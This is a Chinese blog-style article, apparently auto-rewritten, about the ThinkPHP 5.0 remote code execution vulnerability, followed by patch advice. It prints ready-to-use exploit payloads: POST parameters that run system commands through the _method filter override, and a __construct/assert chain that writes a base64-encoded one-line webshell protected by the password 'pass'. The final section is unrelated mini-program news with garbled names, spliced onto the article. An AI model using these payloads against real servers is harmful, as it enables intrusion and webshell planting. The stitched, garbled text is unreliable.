网站程序问题修复-如何修复网站的漏洞

bendan520 网站程序

2023-08-21 0 5,310 百度已收录

立即下单

进入商城

进不了网站？换个网络试试！

本文主要介绍如何修复和解决网站的漏洞。对于你目前正在寻找的问题还是有很好的参考价值的。希望编程之家小编整理的内容对您有所帮助。如果有错误或者考虑不周全的地方网站程序问题修复，欢迎大家指教。

据2019年1月14日消息，thinkPHP再次被曝致命漏洞，可直接执行远程代码。 Getshell将网站木马打包写入网站根目录，甚至直接打包到服务器。该漏洞影响ThinkPHP5.0和ThinkPHP5版本。 0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkPHP5.0.22版本。

攻击者可以伪造远程恶意代码并将数据发布到服务器以利用该漏洞。该漏洞的成因是继2019年新年前后曝光的上一个网站漏洞之后的又一个致命漏洞。 thinkPHP目录下的library文件夹下的thinkrequest.PHP代码。如右图所示：

从上面的代码我们可以看到整个代码的编写过程。首先，当网站打开时，会使用check从app.PHP代码中解析出请求的网站地址，然后通过patch类型进行深度参数化。之后就可以使用 post 形式将数据提交给_method函数，框架会进行判断，然后调用传入的参数值。经过整个代码循环并传入，就可以得到请求的值被覆盖，从而形成远程代码执行，我们来构建恶意代码，看看该漏洞是如何被利用的。

发帖地址：anquan/public/index.PHP?s=captcha

POST内容：c=system&f=whoami&_method=filter

直接远程提交用来执行我们的命令whoami。查看返回的post数据就可以看到我们想看的内容

信息。

在整体各版本中测试，thinkPHP必须打开debug模式才可以写入webshell网站程序问题修复，写入的执行代码为：_method=construct&filter[]=assert&filter[]=file_put_contents('0.PHP',_decode

('JTNDJTI1ZXZhbCUyMHJlcxvlc3QlMjAlMjglMjJwYXNzJTIyJTI5JTI1JTNF'))&server=-1 写入一句话木马，连接密码为pass。

一些低版本网站也可以在不使用验证码参数的情况下执行远程代码。代码如下：_method=__construct&filter[]=system&method=GET&get[]=whoami

_method=__construct&filter[]=assert&server[]=PHPinfo&get[]=PHPinfo

_method=__construct&filter[]=call_user_func&server[]=PHPinfo&get[]=PHPinfo

以上三个都可以执行远程代码。

修补thinkPHP漏洞的建议：

尽快将thinkPHP升级到最新版本。有些网站升级可能不方便，代码文件也可以打补丁。易受攻击的代码是library/think/Request。 PHP在第526行和第527行代码中添加了白名单机制，对请求的数据和接收的数据进行安全限制。 if(in_array($method,['GET','POST','DELETE','PUT','PATCH'])){$this->method=$method，网站程序代码的安全性非常重要、如果网站使用的是开源CMS系统代码。如果不懂程序技术，网站经常会受到黑客的攻击。如果你理解了程序，你就可以自己修复代码中的漏洞。如果您不明白，请聘请专业的网站安全公司。我们来看看程序中的个别代码漏洞。国外的信能安全、绿盟安全、启明星辰等都是比较专业的安全公司。很多黑客之所以能够植入木马病毒，就是为了抓住那些网站代码中的漏洞。

明天凌晨网站打开小程序，陌陌团队将发布重磅消息：①小程序内可直接打开网页，②小程序可关联500个公众号。为了让开发者能够灵活配置小程序，小程序现在提供了嵌入网页的能力。（网友评价这个功能直接把小程序提升到n个高度，手机浏览器秒掉。之后，陌陌将真正成为中国联通互联网的入口。）开发者可以登录小程序后台配置业务域名，即可实现小程序。嵌入网页。那么，用户在使用小程序时，可以直接从小程序进入内嵌网页，也支持用户从内嵌网页返回小程序。

详细操作《小程序支持嵌入网页文档》

1、开发者在小程序后台登录mp.weixin.qq.com，选择设置-开发设置-业务域名，添加配置域名模块。目前个人账户和海外账户暂不支持小程序嵌入网页的功能。

2、每一项配置都需要管理员扫码验证身份。